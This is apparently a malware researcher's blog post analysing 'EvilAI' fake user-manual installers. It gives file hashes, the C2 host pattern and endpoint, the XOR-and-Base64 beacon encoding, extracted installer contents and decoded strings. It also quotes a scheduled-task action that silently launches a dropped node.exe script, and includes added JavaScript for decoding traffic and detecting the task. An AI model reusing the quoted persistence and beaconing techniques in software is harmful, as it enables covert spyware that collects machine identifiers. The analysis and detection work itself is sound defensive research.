EvilAI: Fake Manual Software

UPDATE: September 18, 2025 

Another variant of what I've been looking at over the past week caught my eye today. This is just a quick review of it, showing how the POST data is encoded and how to decode it.

OpenMyManual.exe (9f948215b9ee7e7496ce3bc9e46fda56b50cc8905b88535225c7651007f660d5)

Drops a copy of node.exe as well as a malicious JS file (2cd68ea7f02e8cfaded52d64c2cb71b64560b3799c948960db37e827618ff22d)

Like in my last post, you can run this through a JS deobfuscator, make a couple of quick edits, and then run node.exe with --inspect-brk to set breakpoints and step through the program:


What you eventually get is the C2 (api.evil.com/nss), the POST data, and how that POST data is encoded before it is sent to the C2. The 16-byte buffer is the XOR key; the 176-byte buffer is what becomes the Base64 (shown here as _0xda4df9).

To date, I have not gotten a response back from any of these C2s. I've looked at several of them, and so far they all follow a pattern like ^api\.[a-zA-Z0-9]{18}\.com$

/nss has been consistent as well. In Wireshark I get a TCP RST back from these.
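The encoding described above, as an added example that is not code from the post or from the sample: a reconstruction of the repeating-key XOR plus Base64 scheme so a captured POST body can be decoded without stepping through node.exe. The exact layout (plain repeating-key XOR over the UTF-8 body, nothing prepended) is an assumption; the post only states that a 16-byte buffer is the key and a 176-byte buffer becomes the Base64. The key and body below are constructed sample data, not from a real capture, and the hostname check uses the C2 pattern reported above.

```javascript
// Added example (not the post's or the sample's code). Assumption: the beacon body
// is repeating-key XORed with the 16-byte key and then Base64-encoded, nothing else.
'use strict';

const KEY_LEN = 16;

// Repeating-key XOR: byte i of the input is XORed with key[i % KEY_LEN].
// XOR is its own inverse, so the same function encodes and decodes.
function xorBuf(buf, key) {
  if (key.length !== KEY_LEN) throw new Error(`expected a ${KEY_LEN}-byte key`);
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) out[i] = buf[i] ^ key[i % KEY_LEN];
  return out;
}

// Wire format: UTF-8 body -> XOR -> Base64 text (what is POSTed to /nss).
function encodePost(bodyText, key) {
  return xorBuf(Buffer.from(bodyText, 'utf8'), key).toString('base64');
}

// Reverse: Base64 -> XOR with the same key -> UTF-8 text.
function decodePost(b64, key) {
  return xorBuf(Buffer.from(b64, 'base64'), key).toString('utf8');
}

// Key recovery without a debugger: with a repeating key, XORing the first 16
// ciphertext bytes with 16 known (or guessed) plaintext bytes yields the key.
function recoverKey(b64, knownPrefix) {
  const ct = Buffer.from(b64, 'base64');
  const pt = Buffer.from(knownPrefix, 'utf8');
  if (pt.length < KEY_LEN || ct.length < KEY_LEN) {
    throw new Error(`need at least ${KEY_LEN} known plaintext bytes`);
  }
  return xorBuf(ct.subarray(0, KEY_LEN), pt.subarray(0, KEY_LEN));
}

// Host pattern reported across samples: api.<18 alphanumerics>.com
const C2_HOST_RE = /^api\.[a-zA-Z0-9]{18}\.com$/;
function looksLikeC2Host(host) {
  return C2_HOST_RE.test(host);
}

// Constructed sample data for the demo; neither the key nor the body is real.
const SAMPLE_KEY = Buffer.from('8f1c3a77e2b95d04c6a1f0e39b2d5c48', 'hex');
const SAMPLE_BODY = '{"id":"00000000-0000-0000-0000-000000000000","v":"0.0.0"}';

function demo() {
  const wire = encodePost(SAMPLE_BODY, SAMPLE_KEY);
  console.log('base64 on the wire :', wire);
  console.log('decoded            :', decodePost(wire, SAMPLE_KEY));
  console.log('recovered key      :', recoverKey(wire, SAMPLE_BODY).toString('hex'));
  console.log('api.evil.com C2-shaped?', looksLikeC2Host('api.evil.com'));
}
demo();
```

In practice you paste the Base64 body from the capture into decodePost with the key pulled from the 16-byte buffer at the breakpoint; recoverKey is the fallback when you only have the wire data and can guess the first 16 bytes of the plaintext.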

 
Analysis of hxxps://download.totalusermanuals.com/totalusermanuals[.]exe
Hash (MD5): 10bd14c9fc9e9f6025c839f8fa2adc04


This one has another highly obfuscated script that can be partially decoded using https://obf-io.deobfuscate.io/

This version has more anti-analysis in place, and so far I haven't decoded the outgoing POST, but have decoded a number of strings in the JS.

This latest Fake Manual seems to have some things in common with JustAskJacky, based on strings and obfuscation.

.\innounp.exe -x -m .\totalusermanuals.exe

innounp - the Inno Setup Unpacker, Version 2.65.1 (8/25/2025)

Inno Setup archive: totalusermanuals.exe
Inno Setup version detected: 6.3.0 (Unicode)

#1 {app}\script.js - extracted
#2 {app}\task.xml - extracted
#3 {app}\node\CHANGELOG.md - extracted
#4 {app}\node\corepack - extracted
#5 {app}\node\corepack.cmd - extracted
#6 {app}\node\install_tools.bat - extracted
#7 {app}\node\LICENSE - extracted
#8 {app}\node\node.exe - extracted
#9 {app}\node\nodevars.bat - extracted
#10 {app}\node\npm - extracted
#11 {app}\node\npm.cmd - extracted
#12 {app}\node\npx - extracted
#13 {app}\node\npx.cmd - extracted
#14 {app}\node\README.md - extracted
#15 {app}\Microsoft.Web.WebView2.Core.dll - extracted

A scheduled task is created from task.xml; its Exec action is:

<Exec>
  <Command>C:\Windows\System32\cmd.exe</Command>
  <Arguments>/C start "" /min "%app%\node\node.exe" "%app%\script.js"</Arguments>
  <WorkingDirectory>%app%\node</WorkingDirectory>
</Exec>
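As an added hunting example (not code from the post), here is a small Node.js check over the Exec action of a Task Scheduler XML file that flags the persistence pattern shown in task.xml: cmd.exe launching node.exe against a .js file from a user-controlled install directory via start "" /min. The sample XML is constructed to mirror the fields the post lists (with the Inno Setup %app% placeholder left unresolved, as in the post), the reason codes and the "two or more reasons" threshold are my own, and the path heuristic is an assumption that will need tuning per environment.

```javascript
// Added example (not the post's code). Parses <Exec> actions out of task XML with
// regexes (enough for this format; a real XML parser is fine too) and scores them.
'use strict';

// Constructed sample mirroring the task.xml fields in the post (not the real file).
const SAMPLE_TASK_XML = `<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\cmd.exe</Command>
      <Arguments>/C start "" /min "%app%\\node\\node.exe" "%app%\\script.js"</Arguments>
      <WorkingDirectory>%app%\\node</WorkingDirectory>
    </Exec>
  </Actions>
</Task>`;

// Constructed benign control: a vendor updater launched directly from Program Files.
const BENIGN_TASK_XML = `<Task>
  <Actions>
    <Exec>
      <Command>C:\\Program Files\\Vendor\\updater.exe</Command>
      <Arguments>--check</Arguments>
    </Exec>
  </Actions>
</Task>`;

function unescapeXml(s) {
  return s.replace(/&quot;/g, '"').replace(/&apos;/g, "'").replace(/&lt;/g, '<')
          .replace(/&gt;/g, '>').replace(/&amp;/g, '&').trim();
}

function childText(block, tag) {
  const m = block.match(new RegExp(`<${tag}>([\\s\\S]*?)</${tag}>`));
  return m ? unescapeXml(m[1]) : '';
}

// Every <Exec> action in the file, as {command, arguments, workingDirectory}.
function parseExecActions(xml) {
  const actions = [];
  const re = /<Exec>([\s\S]*?)<\/Exec>/g;
  let m;
  while ((m = re.exec(xml)) !== null) {
    actions.push({
      command: childText(m[1], 'Command'),
      arguments: childText(m[1], 'Arguments'),
      workingDirectory: childText(m[1], 'WorkingDirectory'),
    });
  }
  return actions;
}

// Assumption: installer placeholders and user-writable trees are where a dropped
// runtime lives; legitimate services rarely run an interpreter from here.
const USER_WRITABLE = /(%app%|\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\[^\\]+\\)/i;

function assessExecAction(a) {
  const reasons = [];
  const cmd = a.command.toLowerCase();
  const args = a.arguments.toLowerCase();
  // cmd.exe used only to spawn a minimised window for the real payload.
  if (/(^|\\)cmd\.exe$/.test(cmd) && /\bstart\b/.test(args) && /\/min\b/.test(args)) {
    reasons.push('cmd-start-min');
  }
  // A scripting runtime handed a script file as its argument.
  if (/node\.exe/.test(args) && /\.js\b/.test(args)) reasons.push('node-runs-script');
  if ([a.command, a.arguments, a.workingDirectory].some((p) => USER_WRITABLE.test(p))) {
    reasons.push('user-writable-path');
  }
  return { ...a, reasons, suspicious: reasons.length >= 2 };
}

function analyzeTaskXml(xml) {
  return parseExecActions(xml).map(assessExecAction);
}

console.log(JSON.stringify(analyzeTaskXml(SAMPLE_TASK_XML), null, 2));
console.log(JSON.stringify(analyzeTaskXml(BENIGN_TASK_XML), null, 2));
```

On a live host the same XML can be exported with schtasks /Query /TN <name> /XML, or read from the task files under C:\Windows\System32\Tasks, and fed to analyzeTaskXml in a loop.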

Decoded Strings

t: "get.latest-manuals.com",
Software\Microsoft\Cryptography
MachineGuid
0.2.1
Content-Type
text/plain
Content-Length
POST
utf8
data
end
error
base64
/log.txt
0.2.1
=_=
app
asdc
#version#
#a#
{ "ver": #version#, "a": #argString# }
exports
require
module
__filename
__dirname
//# sourceURL=
./temp.js
Function
Example POST traffic:

[OUTGOING REQUEST] POST get.latest-manuals.com / bodyLen=724
[OUTGOING BODY (utf8)]

Additionally, I ran across these as well (MD5 hashes):

anyproductmanual.exe 895e24527b10897fbfdf661d26d15e70

manualreaderpro.exe 287de08218ea23f7e795da3caf525bb6

manualshq.exe 71bddf977d92f3ad92ec678b0fa226da

AllManualsReader_oc.exe c7b01fbde712d64d869225543b5f2e32

completeusermanuales.exe b264dc54f1055eb4c1164cf1d05d15db

Related Posts:

EvilAI: Fake online speedtests
